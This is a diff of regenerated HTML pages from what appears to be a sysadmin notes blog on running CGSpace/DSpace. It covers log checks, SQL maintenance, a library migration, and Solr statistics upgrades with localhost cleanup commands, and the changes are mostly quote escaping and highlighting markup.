<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>And there are many of these errors every day for the past month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -251,12 +251,12 @@ dspace.log.2018-01-02:34
<ul>
<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
</code></pre><ul>
<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2017-11/'>Read more →</a>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGIAR Library Migration"/>
<meta name="twitter:description" content="Notes on the migration of the CGIAR Library to CGSpace"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -163,7 +163,7 @@ mets.dspaceAIP.ingest.crosswalk.DSPACE-ROLES = NIL
</code></pre><ul>
<li><input checked="" disabled="" type="checkbox"> Import communities and collections, paying attention to options to skip missing parents and ignore handles:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ export PATH=$PATH:/home/cgspace.cgiar.org/bin
$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2515/10947-2515.zip
$ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2516/10947-2516.zip
@ -201,7 +201,7 @@ $ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e
</ul>
<pre tabindex="0"><code>$ for item in 10568-93759/ITEM@10947-46*; do dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/83538 $item; done
</code></pre><p><strong>Get the handles for the last few items from CGIAR Library that were created since we did the migration to DSpace Test in May:</strong></p>
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z');
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;);
</code></pre><ul>
<li>Export them from the CGIAR Library:</li>
</ul>
@ -218,19 +218,19 @@ $ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e
<li><input checked="" disabled="" type="checkbox"> Enable nightly <code>index-discovery</code> cron job</li>
<li><input checked="" disabled="" type="checkbox"> Adjust CGSpace&rsquo;s <code>handle-server/config.dct</code> to add the new prefix alongside our existing 10568, ie:</li>
</ul>
<pre tabindex="0"><code>&quot;server_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
<pre tabindex="0"><code>&#34;server_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;replication_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;replication_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;backup_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;backup_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
</code></pre><p>I had been regenerated the <code>sitebndl.zip</code> file on the CGIAR Library server and sent it to the Handle.net admins but they said that there were mismatches between the public and private keys, which I suspect is due to <code>make-handle-config</code> not being very flexible. After discussing our scenario with the Handle.net admins they said we actually don&rsquo;t need to send an updated <code>sitebndl.zip</code> for this type of change, and the above <code>config.dct</code> edits are all that is required. I guess they just did something on their end by setting the authoritative IP address for the 10947 prefix to be the same as ours&hellip;</p>
<ul>
@ -250,17 +250,17 @@ $ sudo systemctl start nginx
</code></pre><h2 id="troubleshooting">Troubleshooting</h2>
<h3 id="foreign-key-error-in-dspace-cleanup">Foreign Key Error in <code>dspace cleanup</code></h3>
<p>The cleanup script is sometimes used during import processes to clean the database and assetstore after failed AIP imports. If you see the following error with <code>dspace cleanup -v</code>:</p>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(119841) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(119841) is still referenced from table &#34;bundle&#34;.
</code></pre><p>The solution is to set the <code>primary_bitstream_id</code> to NULL in PostgreSQL:</p>
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (119841);
</code></pre><h3 id="psqlexception-during-aip-ingest">PSQLException During AIP Ingest</h3>
<p>After a few rounds of ingesting—possibly with failures—you might end up with inconsistent IDs in the database. In this case, during AIP ingest of a single collection in submit mode (-s):</p>
<pre tabindex="0"><code>org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot;
<pre tabindex="0"><code>org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34;
Detail: Key (handle_id)=(86227) already exists.
</code></pre><p>The normal solution is to run the <code>update-sequences.sql</code> script (with Tomcat shut down) but it doesn&rsquo;t seem to work in this case. Finding the maximum <code>handle_id</code> and manually updating the sequence seems to work:</p>
<pre tabindex="0"><code>dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
dspace=# select setval('handle_seq',86873);
dspace=# select setval(&#39;handle_seq&#39;,86873);
</code></pre>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace CG Core v2 Migration"/>
<meta name="twitter:description" content="Possible changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -445,7 +445,7 @@
</ul>
<hr>
<p>¹ Not committed yet because I don&rsquo;t want to have to make minor adjustments in multiple commits. Re-apply the gauntlet of fixes with the sed script:</p>
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &quot;*.xsl&quot; -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &#34;*.xsl&#34; -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
</code></pre>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace DSpace 6 Upgrade"/>
<meta name="twitter:description" content="Documenting the DSpace 6 upgrade."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -129,283 +129,283 @@
</ul>
<h3 id="re-import-oai-with-clean-index">Re-import OAI with clean index</h3>
<p>After the upgrade is complete, re-index all items into OAI with a clean index:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
$ dspace oai -c import
</code></pre></div><p>The process ran out of memory several times so I had to keep trying again with more JVM heap memory.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
</span></span><span style="display:flex;"><span>$ dspace oai -c import
</span></span></code></pre></div><p>The process ran out of memory several times so I had to keep trying again with more JVM heap memory.</p>
<h3 id="processing-solr-statistics-with-solr-upgrade-statistics-6x">Processing Solr Statistics With solr-upgrade-statistics-6x</h3>
<p>After the main upgrade process was finished and DSpace was running I started processing the Solr statistics with <code>solr-upgrade-statistics-6x</code> to migrate all IDs to UUIDs.</p>
<h2 id="statistics">statistics</h2>
<p>First process the current year&rsquo;s statistics core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;</span>
$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 3,817,407 Bistream View
1,693,443 Item View
105,974 Collection View
62,383 Community View
163,192 Community Search
162,581 Collection Search
470,288 Unexpected Type &amp; Full Site
--------------------------------------
6,475,268 TOTAL
=================================================================
</code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;</span>
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 3,817,407 Bistream View
</span></span><span style="display:flex;"><span> 1,693,443 Item View
</span></span><span style="display:flex;"><span> 105,974 Collection View
</span></span><span style="display:flex;"><span> 62,383 Community View
</span></span><span style="display:flex;"><span> 163,192 Community Search
</span></span><span style="display:flex;"><span> 162,581 Collection Search
</span></span><span style="display:flex;"><span> 470,288 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 6,475,268 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
<ul>
<li>227,000: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>471,000: <code>id:/.+-unmigrated/</code></li>
<li>698,000: <code>*:* NOT id:/.{36}/</code></li>
<li>Majority are <code>type: 5</code> (aka SITE, according to <code>Constants.java</code>) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2019">statistics-2019</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2019">statistics-2019</h2>
<p>Processing the statistics-2019 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 5,569,344 Bistream View
2,179,105 Item View
117,194 Community View
104,091 Collection View
774,138 Community Search
568,347 Collection Search
1,482,620 Unexpected Type &amp; Full Site
--------------------------------------
10,794,839 TOTAL
=================================================================
</code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 5,569,344 Bistream View
</span></span><span style="display:flex;"><span> 2,179,105 Item View
</span></span><span style="display:flex;"><span> 117,194 Community View
</span></span><span style="display:flex;"><span> 104,091 Collection View
</span></span><span style="display:flex;"><span> 774,138 Community Search
</span></span><span style="display:flex;"><span> 568,347 Collection Search
</span></span><span style="display:flex;"><span> 1,482,620 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 10,794,839 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>After several rounds of processing it finished. Here are some statistics about unmigrated documents:</p>
<ul>
<li>2,690,309: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>1,494,587: <code>id:/.+-unmigrated/</code></li>
<li>4,184,896: <code>*:* NOT id:/.{36}/</code></li>
<li>4,172,929 are <code>type: 5</code> (aka SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2019/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2018">statistics-2018</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2019/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2018">statistics-2018</h2>
<p>Processing the statistics-2018 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 3,561,532 Bistream View
1,129,326 Item View
97,401 Community View
63,508 Collection View
207,827 Community Search
43,752 Collection Search
457,820 Unexpected Type &amp; Full Site
--------------------------------------
5,561,166 TOTAL
=================================================================
</code></pre></div><p>After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
</code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 3,561,532 Bistream View
</span></span><span style="display:flex;"><span> 1,129,326 Item View
</span></span><span style="display:flex;"><span> 97,401 Community View
</span></span><span style="display:flex;"><span> 63,508 Collection View
</span></span><span style="display:flex;"><span> 207,827 Community Search
</span></span><span style="display:flex;"><span> 43,752 Collection Search
</span></span><span style="display:flex;"><span> 457,820 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 5,561,166 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>After some time I got an error about Java heap space so I increased the JVM memory and restarted processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2018
</span></span></code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
<ul>
<li>365,473: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>546,955: <code>id:/.+-unmigrated/</code></li>
<li>923,158: <code>*:* NOT id:/.{36}/</code></li>
<li>823,293: are <code>type: 5</code> so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2017">statistics-2017</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2017">statistics-2017</h2>
<p>Processing the statistics-2017 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2017
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 2,529,208 Bistream View
1,618,717 Item View
144,945 Community View
74,249 Collection View
479,647 Community Search
114,658 Collection Search
852,215 Unexpected Type &amp; Full Site
--------------------------------------
5,813,639 TOTAL
=================================================================
</code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2017
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 2,529,208 Bistream View
</span></span><span style="display:flex;"><span> 1,618,717 Item View
</span></span><span style="display:flex;"><span> 144,945 Community View
</span></span><span style="display:flex;"><span> 74,249 Collection View
</span></span><span style="display:flex;"><span> 479,647 Community Search
</span></span><span style="display:flex;"><span> 114,658 Collection Search
</span></span><span style="display:flex;"><span> 852,215 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 5,813,639 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Eventually the processing finished. Here are some statistics about unmigrated documents:</p>
<ul>
<li>808,309: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>893,868: <code>id:/.+-unmigrated/</code></li>
<li>1,702,177: <code>*:* NOT id:/.{36}/</code></li>
<li>1,660,524 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2017/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2016">statistics-2016</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2017/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2016">statistics-2016</h2>
<p>Processing the statistics-2016 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2016
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 1,765,924 Bistream View
1,151,575 Item View
187,110 Community View
51,204 Collection View
347,382 Community Search
66,605 Collection Search
620,298 Unexpected Type &amp; Full Site
--------------------------------------
4,190,098 TOTAL
=================================================================
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2016
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 1,765,924 Bistream View
</span></span><span style="display:flex;"><span> 1,151,575 Item View
</span></span><span style="display:flex;"><span> 187,110 Community View
</span></span><span style="display:flex;"><span> 51,204 Collection View
</span></span><span style="display:flex;"><span> 347,382 Community Search
</span></span><span style="display:flex;"><span> 66,605 Collection Search
</span></span><span style="display:flex;"><span> 620,298 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 4,190,098 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><ul>
<li>849,408: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>627,747: <code>id:/.+-unmigrated/</code></li>
<li>1,477,155: <code>*:* NOT id:/.{36}/</code></li>
<li>1,469,706 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2015">statistics-2015</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2016/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2015">statistics-2015</h2>
<p>Processing the statistics-2015 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2015
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 990,916 Bistream View
